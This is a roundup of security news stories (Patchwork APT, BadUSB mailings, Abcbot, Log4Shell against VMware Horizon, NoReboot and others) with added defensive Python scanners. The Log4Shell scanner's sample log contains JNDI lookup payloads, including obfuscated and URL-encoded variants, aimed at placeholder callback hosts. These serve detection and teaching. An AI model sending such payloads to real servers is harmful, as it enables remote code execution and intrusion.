More stories

    Indian Patchwork hacking group infects itself with remote access Trojan

    An Indian threat group’s inner workings have been exposed after it accidentally infected its own development environment with a remote access Trojan (RAT).

    Tracked by Malwarebytes as Patchwork and known under other names including Hangover Group, Dropping Elephant, Chinastrats, and Monsoon, the Indian group has been active since at least 2015 and runs campaigns designed to deploy RATs for data theft and other malicious activity. In one of the latest attack waves connected to Patchwork, the group targeted individual faculty members at research institutions specializing in biomedical and molecular sciences.

    On January 7, the Malwarebytes team said it was able to delve into the advanced persistent threat (APT) group’s activities after Patchwork infected its own systems with its own RAT, “resulting in captured keystrokes and screenshots of their own computer and virtual machines.”

    According to the researchers, Patchwork typically relies on spear-phishing, with tailored emails sent to specific targets. These emails aim to drop RTF files containing the BADNEWS RAT, of which a new variant has now been found. The latest version, dubbed Ragnatela, was compiled in November 2021. The Trojan can capture screenshots, log keystrokes, list OS processes and files on the machine, upload files, and execute additional payloads.

    After examining Patchwork’s systems, the team established that Ragnatela is delivered inside malicious RTF files as embedded OLE objects, often crafted to look like official communications from Pakistani authorities. An exploit for a known, already patched Microsoft Equation Editor vulnerability is used to execute the RAT.
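    As an added example (not Malwarebytes’ tooling and not anything recovered from Patchwork’s systems), the Python script below performs the first triage step a responder would take on such a lure: it pulls every \objdata hex blob out of an RTF, decodes it, and checks for the Equation Editor ProgIDs and CLSID, as well as any \objclass naming Equation Editor. The sample RTF it ships with is constructed here to exercise the parser and is not a real Patchwork document.

```python
import re

# Equation Editor identifiers. The ProgIDs appear as ASCII in the OLE 1.0
# header inside \objdata; the CLSID {0002CE02-0000-0000-C000-000000000046}
# appears in binary (little-endian GUID) when an OLE2 compound file is embedded.
EQNEDT_PROGIDS = (b"Equation.3", b"Equation.2", b"Equation.DSMT4")
EQNEDT_CLSID_LE = bytes.fromhex("02CE0200" "0000" "0000" "C000000000000046")

_OBJCLASS_RE = re.compile(r"\\\*\\objclass\s*([^\s{}\\]+)")
_OBJDATA_RE = re.compile(r"\\\*\\objdata\s*([0-9A-Fa-f\s]+)")


def decode_objdata(hexblob):
    """Decode an objdata hex run. RTF writers break these runs with newlines
    and spaces, so strip whitespace first and drop a dangling nibble."""
    clean = re.sub(r"\s+", "", hexblob)
    return bytes.fromhex(clean[: len(clean) & ~1])


def find_equation_objects(rtf):
    """Return (indicator, value, offset) tuples for every object in the RTF
    text that names or embeds Equation Editor."""
    findings = []
    for m in _OBJCLASS_RE.finditer(rtf):
        if m.group(1).lower().startswith("equation"):
            findings.append(("objclass", m.group(1), m.start()))
    for m in _OBJDATA_RE.finditer(rtf):
        data = decode_objdata(m.group(1))
        if EQNEDT_CLSID_LE in data:
            findings.append(("objdata-clsid", EQNEDT_CLSID_LE.hex(), m.start()))
            continue
        for progid in EQNEDT_PROGIDS:
            if progid in data:
                findings.append(("objdata-progid", progid.decode(), m.start()))
                break
    return findings


def scan_file(path):
    """Scan an RTF file on disk. latin-1 keeps every byte as one character,
    so offsets reported by find_equation_objects are byte offsets."""
    with open(path, "rb") as f:
        return find_equation_objects(f.read().decode("latin-1"))


# --- constructed sample document (not a real Patchwork lure) -----------------
def _ole1_header(progid):
    """Minimal OLE 1.0 embedded-object header: version, format, class name,
    empty topic and item names. Enough for the parser to see the ProgID."""
    name = progid + b"\x00"
    return (b"\x01\x05\x00\x00" + b"\x02\x00\x00\x00"
            + len(name).to_bytes(4, "little") + name
            + b"\x00\x00\x00\x00" + b"\x00\x00\x00\x00")


_eqn_hex = _ole1_header(b"Equation.3").hex()
_doc_hex = _ole1_header(b"Word.Document.8").hex()
SAMPLE_RTF = (
    r"{\rtf1\ansi\deff0 Please find attached the official notice." "\n"
    r"{\object\objemb{\*\objclass Word.Document.8}{\*\objdata " + _doc_hex + "}}" "\n"
    r"{\object\objemb{\*\objclass Equation.3}{\*\objdata "
    + _eqn_hex[:20] + "\n" + _eqn_hex[20:] + "}}" "\n"   # line break inside the hex run
    "}"
)

if __name__ == "__main__":
    for indicator, value, offset in find_equation_objects(SAMPLE_RTF):
        print(f"{indicator:15} {value:40} at offset {offset}")
```

    Run it as is for the built-in sample, or call scan_file(path) on a suspicious attachment. A hit means the document embeds an Equation Editor object, which rarely appears in legitimate modern documents and warrants detonation in a sandbox; a miss is not a clean bill, since objects can also arrive through RTF constructs this script does not parse.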

    Based on the attacker’s control panels, Malwarebytes was able to name the Pakistani government’s Ministry of Defense, the National Defense University of Islamabad, the Faculty of Bio-Sciences (FBS) at UVAS University, the HEJ Research Institute at the University of Karachi, and the molecular medicine department at SHU University as organizations infiltrated by Patchwork. Because Patchwork infected its own development machine with Ragnatela, the researchers were also able to see the group use VirtualBox and VMware virtual machines (VMs) for malware testing. “Other information that can be obtained is that the weather at the time was cloudy with 19 degrees and that they haven’t updated their Java yet,” Malwarebytes said. “On a more serious note, the threat actor uses VPN Secure and CyberGhost to mask their IP address.” This is the first time the group has been connected to attacks against the biomedical research community, which may suggest a pivot in Patchwork’s priority targets.

    Ransomware warning: Cyber criminals are mailing out USB drives that install malware

    A cybercrime group has been mailing out USB thumb drives in the hope that recipients will plug them into their PCs and install ransomware on their networks, according to the FBI. The USB drives contain so-called ‘BadUSB’ attacks. They were sent in the mail through the United States Postal Service and United Parcel Service. One type contained a message impersonating the US Department of Health and Human Services and claimed to be a COVID-19 warning. Other malicious USBs were sent in the post with a gift card claiming to be from Amazon. 

    BadUSB exploits the USB standard’s versatility: an attacker reprograms a drive’s controller so that it can, for example, emulate a keyboard and inject keystrokes and commands into a computer, install malware before the operating system boots, or spoof a network card and redirect traffic.

    While BadUSB attacks aren’t common, in 2020 cyber criminals posted BadUSB drives to targets with a message claiming to be from BestBuy that urged recipients to insert the drive into a computer in order to view products that could be redeemed with a supposed gift card. That attack was attributed to the FIN7 group, which is also believed to be behind this one.

    According to The Record, the FBI warned that the new BadUSB attacks were shipped on LILYGO-branded devices. The packages were delivered to organizations in the transport and insurance sectors from August, while defense industry targets have received them since November. The USB drives were configured to register as a keyboard device after being plugged in and then injected keystrokes into the target PC to install malware. Numerous attack tools were installed that allowed for exploitation of PCs, lateral movement across the network, and installation of additional malware.
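    The detection a practitioner would want from the description above is a host-side check for exactly that shape: a device that enumerates a HID (keyboard) interface alongside the mass-storage interface a thumb drive is supposed to offer. The Python below is an added example, not the FBI’s or FIN7’s code. On Linux it reads the per-interface descriptors the kernel publishes under /sys/bus/usb/devices; the SAMPLE_DEVICES table is constructed for this example rather than captured from the mailed drives, so the classifier can be exercised on any platform.

```python
import glob
import os

USB_CLASS_HID = 0x03
USB_CLASS_MASS_STORAGE = 0x08
HID_SUBCLASS_BOOT = 0x01
HID_PROTOCOL_KEYBOARD = 0x01

VERDICT_OK = "ok"
VERDICT_KEYBOARD = "keyboard interface: confirm this is a keyboard you plugged in yourself"
VERDICT_SUSPICIOUS = "suspicious: device presents storage and a HID (keyboard-class) interface"


def classify_device(interfaces):
    """interfaces: (bInterfaceClass, bInterfaceSubClass, bInterfaceProtocol)
    triples for all interfaces of one physical device.

    Any HID interface on a device that also offers mass storage is flagged,
    not only boot-protocol keyboards: a non-boot HID keyboard reports
    subclass 0 / protocol 0 and only its report descriptor reveals that it
    types, so the interface class is the safe signal here."""
    classes = {cls for cls, _, _ in interfaces}
    has_hid = USB_CLASS_HID in classes
    boot_keyboard = any(
        cls == USB_CLASS_HID and sub == HID_SUBCLASS_BOOT and proto == HID_PROTOCOL_KEYBOARD
        for cls, sub, proto in interfaces
    )
    if has_hid and USB_CLASS_MASS_STORAGE in classes:
        return VERDICT_SUSPICIOUS
    if boot_keyboard:
        return VERDICT_KEYBOARD
    return VERDICT_OK


def _read_hex_attr(path):
    """sysfs stores these attributes as two hex digits plus a newline."""
    try:
        with open(path) as f:
            return int(f.read().strip(), 16)
    except (OSError, ValueError):
        return None


def scan_sysfs(root="/sys/bus/usb/devices"):
    """Linux only: group interface nodes such as 1-3:1.0 and 1-3:1.1 under
    their parent device 1-3 and collect each interface's class triple."""
    devices = {}
    for iface in glob.glob(os.path.join(root, "*:*")):
        parent = os.path.basename(iface).split(":")[0]
        triple = tuple(
            _read_hex_attr(os.path.join(iface, attr))
            for attr in ("bInterfaceClass", "bInterfaceSubClass", "bInterfaceProtocol")
        )
        if None in triple:
            continue
        devices.setdefault(parent, []).append(triple)
    return devices


def classify_all(devices):
    return {dev: classify_device(ifaces) for dev, ifaces in devices.items()}


# Constructed descriptor sets for this example (not captured from real drives).
SAMPLE_DEVICES = {
    "1-1": [(0x08, 0x06, 0x50)],                      # plain SCSI bulk-only flash drive
    "1-2": [(0x03, 0x01, 0x01), (0x03, 0x00, 0x00)],  # ordinary keyboard plus vendor HID
    "1-3": [(0x08, 0x06, 0x50), (0x03, 0x01, 0x01)],  # "drive" that also types: BadUSB shape
}

if __name__ == "__main__":
    source = scan_sysfs() if os.path.isdir("/sys/bus/usb/devices") else SAMPLE_DEVICES
    for dev, verdict in classify_all(source).items():
        print(f"{dev:8} {verdict}")
```

    The check is a heuristic: a legitimate composite device can pair storage with HID, and a device that presents only a keyboard is indistinguishable from a real one at this layer. The operational control it supports is the same one the FBI warning implies, which is to treat any unexpected keyboard enumeration, especially from a device the user believes is a drive, as an incident rather than a quirk.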

    The tools were used to deploy multiple ransomware strains, including BlackMatter and REvil. BlackMatter is believed to be a rebrand of the DarkSide ransomware group, which appeared to close its business after attacking US fuel distributor Colonial Pipeline in May. That attack prompted discussions between the Biden Administration and the Kremlin over attacks on critical infrastructure.

    Abcbot botnet is linked to Xanthe cryptojacking group

    Researchers have forged a “clear” link between the Abcbot botnet and a well-established cryptojacking group. First discovered in July 2021 by Netlab 360, Abcbot began as a simple scanner that used basic credential-stuffing attacks and known vulnerability exploits to compromise exposed Linux systems.

    However, the developers quickly updated their creation to include self-update mechanisms, exploit kits, worm functionality, and a total of nine distributed denial-of-service (DDoS) attack functions. These findings were a starting point for Cado Security, which published a further analysis of the botnet in December.

    By this stage, Abcbot was also able to detect and kill Docker image-based cryptocurrency miners and malware already present on a target server, as well as disable cloud monitors including the Aliyun (Alibaba Cloud) Assistant and Tencent monitoring components. Trend Micro said that once a deep clean of a compromised server has taken place, new malicious user accounts are added with high levels of privilege, and failsafes are deployed to stop them from being modified or removed.

    While past examples of the botnet’s activity revealed a clean-up before it deployed its own cryptocurrency mining malware, on Monday a new analysis published by Cado Security suggested the malware may be shifting back to more traditional routes: namely, a return to DDoS attacks as a focus. According to the researchers, there is now an established link between the botnet and Xanthe, a cryptojacking campaign documented by Cisco Talos in December 2020.
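    The clean-up and lock-in behaviour described above suggests a concrete check for any exposed Linux host: look for extra UID 0 accounts, accounts nesting their home under /root, sudoers entries that grant passwordless ALL, and files that have been made immutable so an operator cannot simply undo the changes. The Python below is an added example, not Cado’s or Talos’s tooling. The /etc/passwd, sudoers and lsattr contents it audits are constructed for this example and the account names in them are invented; on a real host you would feed it the actual files and the output of `lsattr /etc/passwd /etc/shadow /etc/sudoers /root/.ssh/authorized_keys`.

```python
import re


def parse_passwd(text):
    """Parse /etc/passwd text into dicts; malformed lines are skipped."""
    users = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, _, uid, gid, _, home, shell = fields
        users.append({"name": name, "uid": int(uid), "gid": int(gid),
                      "home": home, "shell": shell})
    return users


def audit_passwd(users, known_root=("root",)):
    """Every finding string starts with the offending account name."""
    findings = []
    for u in users:
        if u["uid"] == 0:
            if u["name"] not in known_root:
                findings.append(f"{u['name']}: uid 0 but not an expected root account")
        elif u["home"] == "/root" or u["home"].startswith("/root/"):
            findings.append(f"{u['name']}: non-root account with home under /root")
    return findings


# user  host=(runas) [tags:] commands   -- group (%) and Defaults lines are skipped,
# which is a simplification: aliases and group grants deserve their own review.
_SUDO_RE = re.compile(r"^\s*([^\s#%]+)\s+\S+\s*=\s*(?:\([^)]*\)\s*)?(.*)$")


def audit_sudoers(text, allowed=("root",)):
    """Flag user specs granting NOPASSWD or unrestricted ALL to users outside the allow-list."""
    findings = []
    for line in text.splitlines():
        m = _SUDO_RE.match(line)
        if not m:
            continue
        user, spec = m.group(1), m.group(2).strip()
        if user in allowed:
            continue
        if "NOPASSWD" in spec or spec == "ALL":
            findings.append(f"{user}: sudoers grants '{spec}'")
    return findings


def immutable_paths(lsattr_output):
    """Parse lsattr lines ('----i---------e------- /etc/passwd') and return the
    paths carrying the immutable flag, which blocks edits even by root until
    `chattr -i` is run. This is the usual 'failsafe' against removal."""
    paths = []
    for line in lsattr_output.splitlines():
        parts = line.split(None, 1)
        if len(parts) == 2 and "i" in parts[0]:
            paths.append(parts[1])
    return paths


# --- constructed inputs for this example ---------------------------------------
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
deploy:x:1001:1001::/home/deploy:/bin/bash
autoupdt:x:0:0::/root:/bin/bash
svcdbus:x:1002:1002::/root/.cache:/bin/sh
"""
SAMPLE_SUDOERS = """\
Defaults env_reset
root ALL=(ALL:ALL) ALL
%sudo ALL=(ALL:ALL) ALL
deploy ALL=(ALL) NOPASSWD: /usr/bin/systemctl restart app
svcdbus ALL=(ALL) NOPASSWD: ALL
"""
SAMPLE_LSATTR = """\
--------------e------- /etc/shadow
----i---------e------- /etc/passwd
----i---------e------- /root/.ssh/authorized_keys
"""

if __name__ == "__main__":
    for f in audit_passwd(parse_passwd(SAMPLE_PASSWD)) + audit_sudoers(SAMPLE_SUDOERS):
        print("account:", f)
    for p in immutable_paths(SAMPLE_LSATTR):
        print("immutable:", p)
```

    None of these findings is proof of compromise on its own (an admin may have set +i deliberately, and a NOPASSWD entry for one service command is common), but a second UID 0 account or a service user homed under /root on a server that has just lost its cloud monitoring agent is exactly the combination the analysis above describes.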

    Talos uncovered Xanthe after the group targeted a Docker-based honeypot with a Monero cryptocurrency miner, XMRig. At the time, Xanthe focused on hijacking the computational resources of vulnerable servers to mine cryptocurrency, and used bash scripts to eradicate competitor malware and maintain persistence.

    After comparing Abcbot and Xanthe samples, Cado Security found code and feature similarities. A VirusTotal graph built from known indicators of compromise (IoCs), stylistic choices, and unique strings then revealed four hosts that overlapped in infrastructure and delivered both Abcbot and Xanthe payloads. However, the samples also revealed recent changes in functionality, including commented-out mining components, that suggest mining may “no longer [be] an objective” of Abcbot.

    “Based on this analysis, we believe that the same threat actor is responsible for both Xanthe and Abcbot and is shifting its objective from mining cryptocurrency on compromised hosts to activities more traditionally associated with botnets, such as DDoS attacks,” the researchers said. “We suspect this won’t be the last malware campaign we analyze from this actor.”

    FlexBooker apologizes for breach of 3.7 million user records, partial credit card information

    Scheduling platform FlexBooker apologized this week for a data breach involving the sensitive information of 3.7 million users. In a statement, the company told ZDNet that a portion of its customer database had been breached after its AWS servers were compromised on December 23. FlexBooker said its “system data storage was also accessed and downloaded” as part of the attack. The company added that it worked with Amazon to restore a backup and was able to bring operations back in about 12 hours.

    “We sent a notification to all affected parties and have worked with Amazon Web Services, our hosting provider, to ensure that our accounts are re-secured,” a spokesperson said. “We deeply apologize for the inconvenience caused by this issue.”

    The spokesperson said the data was “limited to names, email addresses, and phone numbers,” and a website notifying customers of the breach says the same. But Australian security expert Troy Hunt, who runs the Have I Been Pwned site that tracks breached information, said the trove of stolen data included password hashes and partial credit card information for some accounts. Hunt added that the data “was found being actively traded on a popular hacking forum.”

    A FlexBooker spokesperson confirmed Hunt’s report, telling ZDNet that the last three digits of card numbers were included in the breach but not the full card number, expiration date, or CVV.

    Reporters from Bleeping Computer said the group behind the attack, Uawrongteam, leaked information from FlexBooker and two other companies on a hacking forum. They tied the breach to a DDoS attack that FlexBooker reported on December 23. In its log of the attack, FlexBooker said the attack caused widespread outages of its core application functionality and required help from AWS to solve.

    “We have been informed that this should not have been possible, but before they were able to assist technically, they had to ensure that all our security practices were correct. They have completed this step, and this has now gone to their leadership team who have approved dedicating technical resources to this immediately,” FlexBooker said of the assistance from AWS on December 24. “We truly apologize again for the impact here. We have been on the phone with AWS support for 7 hours now, trying to push them through. A brute force attack such as this should not have been possible, so we are pushing them hard to put a network-level solution in place to ensure this is both resolved quickly and also permanently so this never happens again in the future.”

    The issue was resolved about eight hours later. Shared Assessments’ Nasser Fattah said he has seen instances where DDoS attacks are launched as a distraction to disrupt vital business services while the adversary’s primary goal is to gain access and exfiltrate sensitive information.

    “We know that there are financial losses associated with system outages, hence, why security teams have all eyes on glass, so to speak, when there is a DDoS attack,” Fattah said. “And when this happens, it is important to be prepared for the possibility of a multifaceted attack and be very diligent with monitoring other anomalies happening on the network.”

    Ransomware attack on FinalSite still disrupting email services at thousands of schools

    Education technology company FinalSite is still in the process of recovering from a devastating ransomware attack that crippled many of the services they provide to thousands of schools across the world this week. 

    In an update on Friday morning, the company said the “vast majority” of its sites are back up and running on the front end, but many systems are still facing a variety of issues. It urged its customers, which include thousands of schools across 115 countries, to limit “software usage to critical information updates for your front-end” until it has confirmed that all functionality is working fully. “Examples of usage to avoid include sending email/notifications, workflows, relying on calendar and athletic alerts, uploading data etc.,” the company said.

    While some front-end systems are back, FinalSite said some styling may be missing, and users may not be able to access the admin side of their site. Many users will continue to see 503 errors, according to FinalSite. The company first informed customers of issues on January 4 and said its engineers have been working around the clock to resolve the issue. By Thursday, the company acknowledged that it was suffering from a ransomware attack.

    “We are incredibly sorry for this prolonged outage and fully realize the stress it is causing your organizations. While we have made progress overnight to get all websites up and running, full restoration has taken us longer than anticipated,” it wrote in a message to customers.

    “In the ensuing time since the incident, our security, infrastructure, and engineering teams have been working around the clock to restore backup systems and bring our network back to full performance, in a safe and secure manner. Third-party forensic specialists are assisting us in bringing things back slowly and carefully to ensure the environment is safe and stable.”

    One Reddit user said about 2,200 school websites hosted by FinalSite began to go down on January 4. “Many districts are complaining that they are unable to use their emergency notification system to warn their communities about closures due to weather or COVID-19 protocol,” the user wrote. “The impact of this outage is far greater than the attention it has received.”

    A FinalSite spokesperson later told TechCrunch that about 5,000 of its 8,000 customers were affected by the ransomware incident. Local news outlets across the US reported school districts having issues with their websites. Another school administrator contacted Bleeping Computer to report that their website was down, forcing them to contact parents about the outage. They were told that there was no timetable for services to return to normal. Some schools took to Twitter to inform students and parents about website outages, noting that their websites were down because of the ransomware attack on FinalSite.

    Former FBI analyst Crane Hassold likened the attack to the ransomware incident that affected Kaseya and said it illustrated the domino effect ransomware can have on other companies. “When a company that provides solutions for other companies gets hit with ransomware, similar to what we saw with Kaseya last summer, the resulting impact can be exponentially devastating,” said Hassold, who now serves as director of threat intelligence at Abnormal Security. “In the current environment, when COVID is peaking again, and many schools are switching to temporary remote learning, this attack couldn’t have come at a worse time.”

    Log4j flaw: Attackers are targeting Log4Shell vulnerabilities in VMware Horizon servers, says NHS

    The UK’s National Health Service (NHS) has issued a warning that hackers are actively targeting Log4j vulnerabilities and is recommending that organisations within the health service apply the necessary updates to protect themselves. An advisory by NHS Digital says that an “unknown threat group” is attempting to exploit a Log4j vulnerability (CVE-2021-44228) in VMware Horizon servers to establish web shells, which could be used to distribute malware and ransomware, steal sensitive information, and carry out other malicious activity.

    It’s unclear whether the warning was issued because attacks targeting NHS systems have been detected, or as a general precaution because of the ongoing problem of the critical vulnerability in the Apache Log4j Java logging library, which was disclosed in December. “We are aware of an exploit and are actively monitoring the situation. We will support our partners with the system response to this critical vulnerability and will continue to provide guidance to NHS organisations,” an NHS spokesperson told ZDNet.

    The attacks being warned against exploit the Log4Shell vulnerability in the Apache Tomcat service embedded within VMware Horizon. Once a vulnerable instance has been identified, the attacker triggers a Lightweight Directory Access Protocol (LDAP) lookup that loads and executes a malicious Java class, which injects a web shell into the VM Blast Secure Gateway service. If successfully exploited, attackers can establish persistence on the affected networks and use it to carry out a number of malicious activities. NHS Digital recommends that organisations known to be running Horizon servers take appropriate action and apply the necessary patches to ensure their networks can resist attempted attacks.

    “Affected organisations should review the VMware Horizon section of the VMware security advisory VMSA-2021-0028 and apply the relevant updates or mitigations immediately,” said the alert.

    Log4j is used in many forms of enterprise and open-source software, including cloud platforms, web applications and email services, meaning there is a wide range of software in organisations around the world that could be at risk from attempts to exploit the vulnerability. Cyber criminals were quick to scan for vulnerable systems after the vulnerability was disclosed, and many took the opportunity to launch attacks including malware and ransomware campaigns. Attackers are still actively exploiting the vulnerability, Microsoft has warned.

    It’s feared that the widespread use of Log4j in open-source software, to the extent that organisations may not know it is even part of their software stack, could make the vulnerability a problem for years to come. The UK’s National Cyber Security Centre (NCSC) is among those that have issued advice to organisations on how to manage Log4j vulnerabilities in the long run.
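    Since the NHS advisory concerns an HTTP-facing service, the practical detection is to run the Log4Shell lookup pattern over the Horizon servers’ Tomcat access logs, including the URL-encoded and nested forms that attackers used to slip past naive matching on the literal string ${jndi:. The Python below is an added example, not NHS Digital’s or VMware’s tooling. The log lines it scans are constructed here using documentation IP ranges, and the assumption that the logs are in Combined Log Format is this example’s, not something the advisory states.

```python
import re
from urllib.parse import unquote

# Lookups Log4j resolves before it ever sees the word "jndi", which is why
# attackers wrap the payload in them:  ${lower:j}  ${upper:J}  ${env:X:-j}  ${::-j}
_LOWER_UPPER = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
_DEFAULT_VALUE = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")
_JNDI = re.compile(r"\$\{jndi:([a-z]+)://([^/}\s]+)", re.IGNORECASE)


def normalize(text):
    """Undo the evasions seen after disclosure: URL encoding (applied up to
    twice), ${lower:x}/${upper:x}, and ${anything:-x} default-value lookups.
    Innermost lookups collapse first; loop until nothing changes."""
    for _ in range(2):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    previous = None
    while previous != text:
        previous = text
        text = _LOWER_UPPER.sub(r"\1", text)
        text = _DEFAULT_VALUE.sub(r"\1", text)
    return text


def find_jndi(line):
    """Return (scheme, host[:port]) if the line carries a JNDI lookup, else None."""
    m = _JNDI.search(normalize(line))
    return (m.group(1).lower(), m.group(2)) if m else None


def scan_lines(lines):
    """Run find_jndi over an iterable of log lines; returns (line_no, scheme, host)."""
    hits = []
    for n, line in enumerate(lines, 1):
        found = find_jndi(line)
        if found:
            hits.append((n, found[0], found[1]))
    return hits


# Constructed access-log lines (Combined Log Format, documentation IP ranges).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jan/2022:09:14:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.5:1389/a}"',
    '198.51.100.7 - - [10/Jan/2022:09:14:05 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
    '"${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://198.51.100.7:1389/x}"',
    '198.51.100.9 - - [10/Jan/2022:09:14:09 +0000] "GET /portal/?q='
    '%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F198.51.100.9%3A1099%2Fo%7D HTTP/1.1" '
    '404 0 "-" "curl/7.79.1"',
    '192.0.2.20 - - [10/Jan/2022:09:15:00 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (Windows NT 10.0) ${date:yyyy} harmless"',
]

if __name__ == "__main__":
    for line_no, scheme, host in scan_lines(SAMPLE_LOG):
        print(f"line {line_no}: {scheme} lookup to {host}")
```

    Two caveats apply. A hit in the access log shows an attempt, not a successful exploit; the callback host is the thing to pivot on (did the Horizon server open an outbound connection to it, and did a new JSP appear under the Blast gateway’s web root). And a miss does not clear the host: this only normalizes the encodings that were common, and the advisory’s remedy is still the VMSA-2021-0028 patch or mitigation, not log review.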

    Google acquisition of Siemplify is a knockout punch for standalone SOAR

    Google announced the acquisition of Siemplify, a security orchestration, automation, and response (SOAR) tool, this past Monday. Google Cloud’s acquisition of a SOAR tool in and of itself is not surprising — this has been a missing piece for its Chronicle offering that other security analytics platforms have built-in for the past several years. 

    What is interesting, however, is the timing of this acquisition, which comes years after the spate of SOAR acquisitions in 2018-2019. Siemplify was one of the few remaining holdouts as a standalone SOAR, as most other independent SOAR vendors were acquired or diversified their portfolios with other products such as threat intelligence platforms (TIPs). In some ways, that makes this a heady acquisition, as it signals the true end of the standalone SOAR. Forrester predicted early on that the SOAR market could not stand on its own, and given that that was five years ago, it’s starting to feel like we are belaboring the point.

    The bottom line is this: the SIEM has irrevocably been altered into the more holistic security analytics platform, incorporating SIEM, SOAR, and SUBA in a single offering. Just offering a piece of the puzzle (a SOAR, a SIEM, or SUBA) is not enough. Security teams want a unified security analytics platform that they can use through the entire incident response lifecycle, from detection to investigation to the orchestration of response... and beyond?

    SOAR is part of a larger set of SecOps capabilities

    Security teams now have one less standalone SOAR offering to choose from. This is detrimental in some ways, since some practitioners prefer to use a separate, independent SOAR offering. They find the depth of available integrations more powerful and prefer a tool, and the vendor behind it, to be entirely focused on improving automation in the SOC. While standalone SOAR is becoming a rarity, SOAR still exists in many forms. There are benefits to having a security analytics platform that tightly integrates SIEM and SOAR. A combined tool can help you implement more seamless automation and streamline the entirety of the incident response lifecycle in one place. It also gives you one less vendor to manage, and data from the latest Forrester Analytics Business Technographics® Security Survey shows that security pros are looking to consolidate security tooling.

    Buying SOAR as a standalone versus as part of a broader platform is the classic best-of-breed versus best-of-suite debate. The tricky part, though, is that SOAR is the supporting act, not the headliner. This means things get a little more complicated, as you will find in the flavors of SOAR below.

    Flavors of SOAR

    Consider the different flavors of SOAR and the risks of each:

      • Integrated security analytics platforms can provide tight integration and a simpler user experience. The main challenge with these vendors is ensuring that they stay cutting-edge: big suites of products tend to lead to complacency on innovation and bloat.
      • Security analytics portfolios try to balance the best of what standalone SOAR offers while providing that integration (but this makes them more likely to fail at both, as a jack of all trades). If these vendors struggle with one element of their SOAR offering, it’s more likely to be the integrations with other vendors than with their own tools.
      • SOAR + TIP + etc. vendors, or those with other additional areas of focus, bank on the fusion between SOAR and their adjacent offerings. This can be unique and provides them a way of staying independent while still gaining ground in different markets. Combining SOAR and TIP capabilities also helps to operationalize threat intelligence in the SOC.
      • Standalone SOAR can have a great depth of integrations because of its independence and its singular focus on building better automation for the SOC. Even if you choose a standalone SOAR, however, it may not be standalone for much longer.

    This post was written by Analyst Allie Mellen and it originally appeared here.

    NoReboot attack fakes iOS phone shutdown to spy on you

    A new technique that fakes iPhone shutdowns to perform surveillance has been published by researchers. 

    Dubbed “NoReboot,” ZecOps’ proof-of-concept (PoC) attack is described as a persistence method that can circumvent the normal practice of restarting a device to clear malicious activity from memory. Making its debut with an analysis and a public GitHub repository this week, ZecOps said that the NoReboot Trojan simulates a true shutdown while providing cover for the malware to operate, which could include covertly hijacking the microphone and camera to spy on the handset’s owner.

    “The user cannot feel a difference between a real shutdown and a ‘fake shutdown’,” the researchers say. “There is no user interface or any button feedback until the user turns the phone back ‘on’.”

    The technique takes over the expected shutdown event by injecting code into three system components: InCallService, SpringBoard, and backboardd. It presumes malware already running on the handset with enough privilege to inject into those components; it is a persistence trick layered on an existing compromise, not an initial-access exploit. When an iPhone is turned off there are physical indicators that this has completed, such as a sound, vibration, and the Apple logo appearing onscreen, but by suppressing that “physical feedback” the malware can create the appearance of a shutdown while a live connection to an operator is maintained.
    “When you slide to power off, it is actually a system application /Applications/InCallService.app sending a shutdown signal to SpringBoard, which is a daemon that is responsible for the majority of the UI interaction,” the researchers explained. “We managed to hijack the signal by hooking the Objective-C method -[FBSSystemService shutdownWithOptions:]. Now instead of sending a shutdown signal to SpringBoard, it will notify both SpringBoard and backboardd to trigger the code we injected into them.”

    The spinning wheel that indicates a shutdown in progress can then be hijacked via backboardd, and SpringBoard can be forced to exit and blocked from restarting. ZecOps said that by taking over SpringBoard, a target iPhone can “look and feel” like it is not turned on, which is the “perfect disguise for the purpose of mimicking a fake power off.” Users, however, still have the option of a forced restart. This is where further tampering with backboardd comes in: by monitoring user input, including how long buttons are held, a reboot can be simulated just before a true restart would take place, for example by displaying the Apple logo early.

    “Stopping users from manually restarting an infected device by making them believe they have successfully done so is a notable malware persistence technique,” Malwarebytes commented. “On top of that, human deception is involved: just when you thought it’s gone, it’s still pretty much there.”

    Because the technique relies on tricking users rather than on a vulnerability or bug in iOS, it is not something that can be fixed with a patch. ZecOps says that the NoReboot method affects all versions of iOS and that only hardware indicators could help in detecting this kind of attack. ZecOps published a video demonstration alongside the write-up.
